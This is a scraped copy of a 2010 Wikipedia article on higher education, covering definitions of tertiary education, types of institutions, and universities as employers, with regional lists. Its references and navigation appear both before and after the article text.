^ Robertson, R. John (2006) Digital preservation in the Tertiary education sector: management implications. Library Review, 55 (3). pp. 173-178. ISSN 0024-2535. Available Online at: http://strathprints.strath.ac.uk/1840/ (visited 18/06/09)
^ Harvey, L. (2004). "Tertiary education". Analytic Quality Glossary. Quality Research International. Retrieved 25 November 2008.
[edit]References
Higher education in the United States
Bakvis, Herman and David M. Cameron (2000), "Post-secondary education and the SUFA". IRPP.
Commission Reports: A National Dialogue: The Secretary of Education's Commission on the Future of Higher Education, United States Department of Education, 2006. [1]
Davies, Antony and Thomas W. Cline (2005). The ROI on the MBA, BizEd.
Douglass, John A. and Todd Greenspan, eds. "The History of the California Master Plan for Higher Education."
El-Khawas, E. (1996). Campus trends. Washington, DC.: American Council on Education.
Ewell, P.T. (1999). Assessment of higher education and quality: Promise and politics. In S.J. Messick (Ed.), Assessment in higher education: Issues of access, quality, student development, and public policy. Mahwah, NJ: Erlbaum.
Finn, C. E. (1988, Jul.-Aug.). Judgment time for higher education: In the court of public opinion. Change, 20(4), 34-39.
Forest, James and Kevin Kinser (2002). Higher Education in the United States: An Encyclopedia. Santa Barbara: ABC-CLIO.
Green, Madeleine, F., ed. 1988. Leaders for a New Era: Strategies for Higher Education. New York: Macmillan.
Snyder, Benson R. (1970). The Hidden Curriculum. Cambridge, MA: MIT Press.
Spellings, Margaret, "A Test of Leadership: Charting the Future of U.S. Higher Education", A Report of the Commission Appointed by Secretary of Education Margaret Spellings, September 2006. (highlights of report)
Veblen, Thorstein (1918). The Higher Learning in America: A Memorandum on the Conduct of Universities by Businessmen. New York: Huebsch
[edit]External links
Association for the Study of Higher Education
Center for Higher Education Policy Studies
World Bank Tertiary Education
college.gov - U.S. Department of Education
Categories: Educational stages | Higher education
article discussion edit this page history
Try Beta Log in / create account
navigation
Main page
Contents
Featured content
Current events
Random article
search
interaction
About Wikipedia
Community portal
Recent changes
Contact Wikipedia
Donate to Wikipedia
Help
toolbox
What links here
Related changes
Upload file
Special pages
Printable version
Permanent link
Cite this page
languages
العربية
Aragonés
Asturianu
Català
Dansk
Deutsch
Español
Français
Furlan
Galego
한국어
हिन्दी
Bahasa Indonesia
Italiano
עברית
Lietuvių
Nederlands
日本語
Norsk (bokmål)
Norsk (nynorsk)
Occitan
Polski
Português
Русский
Simple English
ไทย
Українська
اردو
Tiếng Việt
中文
This page was last modified on 4 March 2010 at 02:01.
Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply. See Terms of Use for details.
Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc., a non-profit organization.
Contact us Privacy policy About Wikipedia Disclaimers
From Wikipedia, the free encyclopedia
N.B./Tertiary education as a concept in the United Kingdom and some other countries includes also further education[1] as well as higher education. For information about further education look under that term. For most other countries, "tertiary education" is synonymous with "higher education".
This article cites its sources but does not provide page references. You can help to improve it by introducing citations that are more precise.
The University of Cambridge is a prestigious institute of higher learning in the U.K.
Higher education refers to a level of education that is provided at academies, universities, colleges, vocational universities, community colleges, liberal arts colleges, institutes of technology and certain other collegiate-level institutions, such as vocational schools, trade schools, and career colleges, that award academic degrees or professional certifications.
Since 1950, Article 2 of the first Protocol to the European Convention on Human Rights obligates all signatory parties to guarantee the right to education. At the world level, the United Nations International Covenant on Economic, Social and Cultural Rights of 1966, guarantees this right under its Article 13, which states that "higher education shall be made equally accessible to all, on the basis of capacity, by every appropriate means, and in particular by the progressive introduction of free education".
Note that in North America, but not in Canada, the word "college" is very often used as a synonym for "university", especially in efficient conversation, for the simple reason that "college" is a two-syllable word, whereas "university" is five syllables long. Thus, if a person says, "I will return to college next fall," that term also includes any university, or any Institute of Technology (eight syllables long), such as the California Institute of Technology. However, in the United Kingdom and Australia, "University" is often shortened to "Uni".
Contents [hide]
1 Overview
2 Types
2.1 General
2.2 Liberal arts
2.2.1 Performing arts
2.2.2 Plastic or visual arts
2.3 Vocational
2.4 Professional Education
3 Recognition of studies
4 As employers
5 By region
5.1 Africa
5.2 Asia
5.3 Europe
5.4 North America and South America
5.5 Oceania
6 See also
7 Notes
8 References
9 External links
[edit]Overview
Higher Education is an educational level that follows the completion of a school providing a secondary education, such as a high school, secondary school, or gymnasium. Tertiary education is normally taken to include undergraduate and postgraduate education, as well as vocational education and training. Colleges, universities, and Institutes of Technology are the main institutions that provide tertiary education (sometimes known collectively as tertiary institutions). Examples of institutions that provide post-secondary education are vocational schools, community colleges, independent colleges (e.g. St. Mary's College), Institutes of Technology, and universities in the United States, the institutes of Technical and Further Educations in Australia, CEGEPs in Quebec, and the IEKs in Greece. They are sometimes known collectively as tertiary institutions. Completion of tertiary education generally results in the awarding of certificates, diplomas, or academic degrees, but the students who do not receive these (by poor performance) outnumber those who do. High performance is expected of students in Higher Education, and those who cannot meet the standards must leave.
Rupert I founded the University of Heidelberg in 1386
Higher education includes teaching, research, exacting applied work (e.g. in medical schools and dental schools), and social services activities of universities. Within the realm of teaching, it includes both the undergraduate level (sometimes referred to as tertiary education), and beyond that, graduate-level (or postgraduate level) for very highly-qualified students who wish to go further in their education and skills. This level of education is often referred to as graduate school, especially in North America.
In the United Kingdom and certain other counties (e.g. Ireland), post-secondary school education below the level of higher education is referred to as "further education". "Higher Education" in the U.K. generally involves work towards a college-degree-level or foundation degree education.
In many developed countries, a high proportion of the population (up to 50%), now enter higher education at some time in their lives. Higher education is therefore very important to national economies, both as a significant industry in its own right and as a source of trained and educated personnel for the rest of the economy.
There can be some disagreement about what precisely constitutes post-secondary, graduate-school, or tertiary education: "It is not always clear, though, what tertiary education includes. Is it only that which results in a formal qualification or might it include leisure classes? In the U.K., are A-levels tertiary education as they are post-compulsory, but taught in school settings, as well as colleges? Is professional updating or on-the-job training part of tertiary education, even if it does not follow successful completion of secondary education?"[2]
There are two types of higher education in the U.K.: higher academic education, and higher vocational education. Higher education in the United States and Canada specifically refers to post-secondary institutions that offer Associate's degrees, Bachelor's degrees, Master's degrees, Education Specialist (Ed.S.) degrees or Doctor of Philosophy (Ph.D.) degrees, or their equivalents, and also higher professional degrees in areas such as medicine, dentistry, the law, optometry, etc.
Such institutions may also offer non-degree certificates, which indicate completion of a set of courses comprising some body of knowledge, but the granting of such certificates is not the primary purpose of the institutions. Tertiary education is not a term used in reference to post-secondary institutions in the United States or Canada.
[edit]Types
[edit]General
The general higher education and training that takes place in a university, college, or Institute of Technology usually includes significant theoretical and abstract elements, as well as applied aspects. In contrast, the vocational higher education and training that takes place at vocational universities and schools usually concentrates on practical applications, with very little theory.
In addition, professional-level education is always included within Higher Education, and usually in Graduate Schools, since many postgraduate academic disciplines are both vocationally, professionally, and theoretically/research oriented, such as in medicine, the law, dentistry, and veterinary medicine. A basic requirement for entry into these graduate-level programs is almost always a bachelor's degree, and for many of the top-level medical schools (e.g. the University of Chicago), nearly all of the entering students already possess a Master's Degree or a Ph.D. in a relevant, supporting subject, such as chemistry, biology, physics, or chemical engineering. Requirements for admission to such high-level graduate programs is extremely competitive, and admitted students are expected to perform at a very high level.
[edit]Liberal arts
Main article: Liberal arts college
Academic areas that are included within the Liberal arts include:
History
Languages including English
Literature
Philosophy
Psychology
Sociology
Theater
Music
Political Science
Religious studies
The so-called "Great Books Program"
[edit]Performing arts
Main article: Performing arts education
The performing arts differ from the plastic arts or visual arts, insofar as the former uses the artist's own body, face and presence as a medium; the latter uses materials such as clay, metal or paint, which can be molded or transformed to create a work of art.
Higher educational institutions include:
Circus schools
College or university school of music
Dance school
Drama school
Music education
[edit]Plastic or visual arts
Main articles: Art education and Art school
The plastic arts or visual arts are a class of art forms, that involve the use of materials, that can be moulded or modulated in some way, often in three dimensions. Examples are painting, sculpture, and drawing, etc.
Higher educational institutions in these arts are:
Film schools
List of art schools
List of art schools in Europe
List of international architecture schools
[edit]Vocational
Main articles: Vocational university, Vocational school, and Technical school
Higher vocational education and training takes place at the non-university tertiary level. Such education combines teaching of both practical skills and theoretical expertise. Higher education differs from other forms of post-secondary education such as that offered by institutions of vocational education, which are more colloquially known as trade schools. Higher vocational education might be contrasted with education in a usually broader scientific field, which might concentrate on theory and abstract conceptual knowledge.
The term "vocational university" is a self-contradictory non sequitur (an oxymoron) in most countries, but some wish to use it, anyway. It is a so-called institution of higher education and sometime research, which grants so-called professional degrees like so-called professional bachelor's degree, professional master's degree, and professional doctorates) in a variety of subjects.
[edit]Professional Education
Scientific Dentistry
Human Medicine
Graduate College of the Law
Graduate College of Optometry
Veterinary Medicine
Graduate College of Public Policy
Graduate College of Architecture
Podiatric Medicine
Graduate College of Pharmacy
Graduate College of Business
Graduate College of Journalism
Graduate College of Library Science
Professional certification
[edit]Recognition of studies
The Lisbon Recognition Convention stipulates that degrees and periods of study must be recognised in all Signatory Parties of the Convention.
[edit]As employers
Universities are fairly large employers. Depending on the funding, a university typically has a teacher per 3-20 students. According to the ideal of research-university, the university teaching staff is actively involved in the research of the institution. In addition, the university usually also has dedicated research staff and a considerable support staff. Typically to work in higher education as a member of the academic faculty, a candidate must first obtain a doctorate in an academic field, although some lower teaching positions require only master's degree. Member of the staff or administration usually have education that is necessary for the fulfilment of their duties. Depending on the university, the main administration is more or less centralized. Typically most of the administrative staff works in different administrative sections, such as Student Affairs. In addition, there may be central support units, such as a university library which have a dedicated staff.
The professional field involving the collection, analysis, and reporting of higher education data is called institutional research. Professionals in this field can be found, in addition to universities, in e.g. state educational departments.
[edit]By region
[edit]Africa
Main article: Education in Africa
Education in Egypt
List of universities in South Africa
List of universities in Somalia
Madrasah
[edit]Asia
See also: Category:Universities and colleges in Asia
Colleges and institutes in India
Education in the People's Republic of China
Education in Bangladesh
Higher education in Iran
List of universities and colleges in Israel
List of colleges and universities in the Philippines
List of universities in Pakistan
Madrasah
[edit]Europe
Main article: European Higher Education Area
Dutch universities
Higher education in Poland
Italian universities
League of European Research Universities
List of colleges and universities in France
List of institutions of higher learning in Russia
List of universities in Germany
List of universities in Finland
List of universities in Romania
List of universities in Sweden
List of universities in Ukraine
Spanish universities
Universities in the United Kingdom
[edit]North America and South America
Higher education in Canada
Higher education in the United States
Universities and Higher Education in Brazil
List of schools in United States territories
List of universities in Mexico
List of Argentine universities
List of universities in Brazil
List of universities in Chile
List of universities in Peru
[edit]Oceania
List of universities in Australia
List of universities in New Zealand
Technical and Further Education (TAFE)
[edit]See also
Education portal
University portal
Book:Education
Books are collections of articles which can be downloaded or ordered in print.
Adult education
Academic Inflation
Academic job market
First professional degree
Foundation degree
Further education
Higher education policy
Liberal education
Lifelong learning
Professional certification
Remedial education
[edit]Notes
^ Robertson, R. John (2006) Digital preservation in the Tertiary education sector: management implications. Library Review, 55 (3). pp. 173-178. ISSN 0024-2535. Available Online at: http://strathprints.strath.ac.uk/1840/ (visited 18/06/09)
^ Harvey, L. (2004). "Tertiary education". Analytic Quality Glossary. Quality Research International. Retrieved 25 November 2008.
[edit]References
Higher education in the United States
Bakvis, Herman and David M. Cameron (2000), "Post-secondary education and the SUFA". IRPP.
Commission Reports: A National Dialogue: The Secretary of Education's Commission on the Future of Higher Education, United States Department of Education, 2006. [1]
Davies, Antony and Thomas W. Cline (2005). The ROI on the MBA, BizEd.
Douglass, John A. and Todd Greenspan, eds. "The History of the California Master Plan for Higher Education."
El-Khawas, E. (1996). Campus trends. Washington, DC.: American Council on Education.
Ewell, P.T. (1999). Assessment of higher education and quality: Promise and politics. In S.J. Messick (Ed.), Assessment in higher education: Issues of access, quality, student development, and public policy. Mahwah, NJ: Erlbaum.
Finn, C. E. (1988, Jul.-Aug.). Judgment time for higher education: In the court of public opinion. Change, 20(4), 34-39.
Forest, James and Kevin Kinser (2002). Higher Education in the United States: An Encyclopedia. Santa Barbara: ABC-CLIO.
Green, Madeleine, F., ed. 1988. Leaders for a New Era: Strategies for Higher Education. New York: Macmillan.
Snyder, Benson R. (1970). The Hidden Curriculum. Cambridge, MA: MIT Press.
Spellings, Margaret, "A Test of Leadership: Charting the Future of U.S. Higher Education", A Report of the Commission Appointed by Secretary of Education Margaret Spellings, September 2006. (highlights of report)
Veblen, Thorstein (1918). The Higher Learning in America: A Memorandum on the Conduct of Universities by Businessmen. New York: Huebsch
[edit]External links
Association for the Study of Higher Education
Center for Higher Education Policy Studies
World Bank Tertiary Education
college.gov - U.S. Department of Education
Categories: Educational stages | Higher education
article discussion edit this page history
Try Beta Log in / create account
navigation
Main page
Contents
Featured content
Current events
Random article
search
interaction
About Wikipedia
Community portal
Recent changes
Contact Wikipedia
Donate to Wikipedia
Help
toolbox
What links here
Related changes
Upload file
Special pages
Printable version
Permanent link
Cite this page
languages
العربية
Aragonés
Asturianu
Català
Dansk
Deutsch
Español
Français
Furlan
Galego
한국어
हिन्दी
Bahasa Indonesia
Italiano
עברית
Lietuvių
Nederlands
日本語
Norsk (bokmål)
Norsk (nynorsk)
Occitan
Polski
Português
Русский
Simple English
ไทย
Українська
اردو
Tiếng Việt
中文
This page was last modified on 4 March 2010 at 02:01.
Text is available under the Creative Commons Attribution-ShareAlike License; additional terms may apply. See Terms of Use for details.
Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc., a non-profit organization.
Contact us Privacy policy About Wikipedia Disclaimers
Subscribe to:
Posts (Atom)